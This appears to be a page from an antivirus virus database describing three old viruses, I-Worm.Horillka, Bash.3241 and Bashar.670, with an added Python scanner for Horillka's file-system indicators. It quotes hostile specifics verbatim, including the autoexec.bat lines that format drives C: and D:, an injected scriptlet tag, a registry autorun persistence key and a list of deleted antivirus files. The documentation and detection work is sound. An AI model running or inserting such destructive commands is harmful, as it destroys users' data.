Virus Database


I-Worm.Horillka

Description I-Worm.Horillka

This malicious worm spreads via the Internet in the form of a file attached to infected messages. It is an encoded VBS script of 25562 bytes.
When downloaded, Horilka decrypts itself.
It copies itself to the Windows system directory under the name WinSys32dll.vbs and registers this file in the system registry autorun key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinSys32dll
The virus mass-mails itself to all addresses found in the Microsoft Outlook address book.
Characteristics of infected messages:
Message header:
Внимание!
(English: Attention!)
Message body:
Выпущено новое vbs обновление для поиска вирусов в памяти ОС Windows!
Оно помогает бороться с вирусами, рассылающимися по почте.
Антивирусный модуль написан на скрипт-языке, что помогает перехватывать
vb и js вирусы, прежде чем они начнут деструктивную деятельность.
Достаточно открыть файл и программа по устранению вирусов проведет поиск
вредоносных программ в памяти компьютера.
(English: A new vbs update for finding viruses in Windows OS memory has been released! It helps fight viruses that spread by e-mail. The antivirus module is written in a scripting language, which helps intercept vb and js viruses before they begin destructive activity. Simply open the file and the virus removal program will search the computer's memory for malicious programs.)
Attachment:
a VBS script,
WinSys32.dll.vbs
Once messages have been sent, the virus sends its author a message which includes all .pwl (password) files found in the Windows directory.
Messages are sent once, when each user's configuration is loaded.
The virus copies itself to all disks and all directories under the name Folderdll.vbs and marks these files as hidden.
It searches the Windows folder for files with the following extensions:
.vbs
.jpg
.jpeg
.gif
.bmp
.htm
.html
.avc
.txt
.doc
.mp3
.wav
.dbf
Horilka overwrites .vbs files with its own code.
It replaces .jpg, .jpeg, .gif and .bmp files with a GIF format graphic contained in the body of the virus.
It adds the following code to .htm and .html files:
<object id='test' data='#' width='100%' height='100%' type='text/x-scriptlet' VIEWASTEXT </object>
.avc files are overwritten with the phrase:
Vyatka was here
.txt and .doc files are overwritten with the following text:
Уважаемые господа! Вас хакнул вирус из Вятки - задницы России.
Dear friends! You was hacked by virus from Vyatka (situated in deep ass of Russia)
..:: Xpi1oT ::..
.mp3 and .wav files are replaced by sound files contained in the body of the worm.
If the worm finds any files with a .dbf extension, it deletes them.
The virus is coded to display the announcement:
COOOOOOOOL
on 11th December every year, and to overwrite the autoexec.bat file with the following text:
@Windows upgrading your systemall
@Please wait
format c: /autotest /q /u
@Please wait...
format d: /autotest /q /u
@Your system was hacked by virus from Vyatka (situated in deep ass of Russia)
Once this takes place, the system will reboot, resulting in the formatting of the C: hard disk.
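As an added example (not part of the original database entry), the following Python scans a directory tree for the file-system traces listed above: dropped copies of the script, the injected scriptlet object tag in .htm/.html files, the autoexec.bat format payload, and the worm's text written over .avc/.txt/.doc files. The sample tree it scans is constructed inline from harmless stand-in files.

```python
import os
import re
import tempfile
# File-system indicators taken from the Horillka description above.
DROPPED_NAMES = {"winsys32dll.vbs", "winsys32.dll.vbs", "folderdll.vbs"}
SCRIPTLET_TAG = re.compile(r"<object[^>]*type='text/x-scriptlet'", re.I)
OVERWRITE_MARKERS = ("Vyatka was here", "..:: Xpi1oT ::..", "hacked by virus from Vyatka")

def scan_tree(root):
    """Return (path, reason) pairs for files under root matching an indicator."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() in DROPPED_NAMES:          # dropped copy of the script
                hits.append((path, "dropped worm copy"))
                continue
            ext = os.path.splitext(name)[1].lower()
            if ext not in (".htm", ".html", ".avc", ".txt", ".doc", ".bat"):
                continue
            with open(path, encoding="latin-1", errors="replace") as f:
                body = f.read()
            if ext in (".htm", ".html") and SCRIPTLET_TAG.search(body):
                hits.append((path, "scriptlet object injected"))
            elif ext == ".bat" and "format c: /autotest" in body.lower():
                hits.append((path, "autoexec.bat format payload"))
            elif any(marker in body for marker in OVERWRITE_MARKERS):
                hits.append((path, "file contents overwritten"))
    return hits

def build_sample_tree():
    """Constructed sample tree of harmless stand-in files (not real infected files)."""
    root = tempfile.mkdtemp()
    samples = {
        "WINDOWS/SYSTEM/WinSys32dll.vbs": "' constructed stand-in for the dropped script",
        "docs/Folderdll.vbs": "' constructed stand-in for a hidden copy",
        "web/index.htm": "<html><body>page</body></html>\n<object id='test' data='#' "
                         "width='100%' type='text/x-scriptlet' VIEWASTEXT </object>",
        "web/clean.html": "<html><body>clean page</body></html>",
        "notes/readme.txt": "Dear friends! You was hacked ...\n..:: Xpi1oT ::..",
        "notes/ok.txt": "ordinary notes, untouched",
        "autoexec.bat": "@Please wait\nformat c: /autotest /q /u\n",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as f:
            f.write(content)
    return root
```

Running scan_tree(build_sample_tree()) flags the five planted files and leaves clean.html and ok.txt alone.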


Bash.3241

Description Bash.3241

These are dangerous memory resident polymorphic parasitic viruses. They hook INT 21h and write themselves to the end of COM and EXE files that are executed or opened. The viruses also affect ARJ archives, inserting an infected dropper file into them. The viruses use many anti-debugging tricks, which are buggy and often halt the system as a result.
The viruses perform several actions directed at disabling anti-virus software. First of all, while installing themselves in memory, they look for the TBAV anti-virus driver in memory and disable it. They also look for the following anti-virus data files and delete them:
ANTI-VIR.DAT CRC.SVS MSAV.CHK BOOT.MS
ANTIVIR.DAT CRC_.SVS SMARTCHK.CPS BOOT.NTZ
ANYCHECK.VAL FILES.VVL TBUTIL.DAT BOOT.TAV
AVP.CRC FINGERP.VVF ZZ##.IM IV.INI
CHKLIST.CPS IM.PRM _ADINF.INI PART.NTZ
CHKLIST.MS IVB.INI AV.CRC VIRSORT.DAT
CHKLIST.TAV IVB.NTZ BOOT.CPS TBUTIL.DAT

The viruses also patch the AVP 2.x package, if it is installed. They create the BIZATCH.AVB database in the AVP directory and register it in the AVP.SET file. See "Anti-AVP" for more details.
From September 17th till October the viruses attempt to erase disk sectors and display a picture, but fail because of a bug. The picture looks as follows:
all. NO! ... ... MNO! ...
..... MNO!! ...................... MNNOO! ...
..... MMNO! ......................... MNNOO!! .
.... MNOONNOO! MMMMMMMMMMPPPOII! MNNO!!!! .
... !O! NNO! MMMMMMMMMMMMMPPPOOOII!! NO! ....
...... ! MMMMMMMMMMMMMPPPPOOOOIII! ! ...
........ MMMMMMMMMMMMPPPPPOOOOOOII!! .....
........ MMMMMOOOOOOPPPPPPPPOOOOMII! ...
....... MMMMM.. OPPMMP .,OMI! ....
...... MMMM:: o.,OPMP,.o ::I!! ...
.... NNM:::.,,OOPM!P,.::::!! ....
.. MMNNNNNOOOOPMO!!IIPPO!!O! ..... ,
... MMMMMNNNNOO:!!:!!IPPPPOO! .... ***** ================-
.. MMMMMNNOOMMNNIIIPPPOO!! ...... AuRoDrEpH.....
...... MMMONNMMNNNIIIOO!.......... The Drow
....... MN MOMMMNNNIIIIIO! OO .......... Was Back !!!
......... MNO! IiiiiiiiiiiiI OOOO ...........
...... NNN.MNO! . O!!!!!!!!!O . OONO NO! ........
.... MNNNNNO! ...OOOOOOOOOOO . MMNNON!........
...... MNNNNO! .. PPPPPPPPP .. MMNON!........
...... OO! ................. ON! .......

The viruses also delete disk files. In the root directories of all available logical drives they delete the "?????x??.*" files, where "x" is the drive's letter. They also look for the SYSTEM\IOSUBSYS\HSFLOP.PDR file in the Windows directory and delete it.
The viruses contain the text strings:
CARO: Please label this creation Hare.Little_Brother :-) or if you
want BSHME.Buggy.7xxx - This version is for educational purpose only!
Greetx to all virus writers! Still buggy but it works...
-=[ 1996 ]=-
-=[ U$A ]=-
-=[ BSHME ]=-

Bashar.670

Description Bashar.670

These are dangerous memory resident encrypted parasitic viruses; to decrypt themselves they use i387 instructions in their decryption loops. They hook INT 21h and write themselves to the end of COM files that are executed. Because of a bug they may corrupt files while infecting them. The viruses contain the text string:
"[Bashar_Teg] by C.W. - 1997 (JAofM)"





Copyright © 2005 Virus-Database.com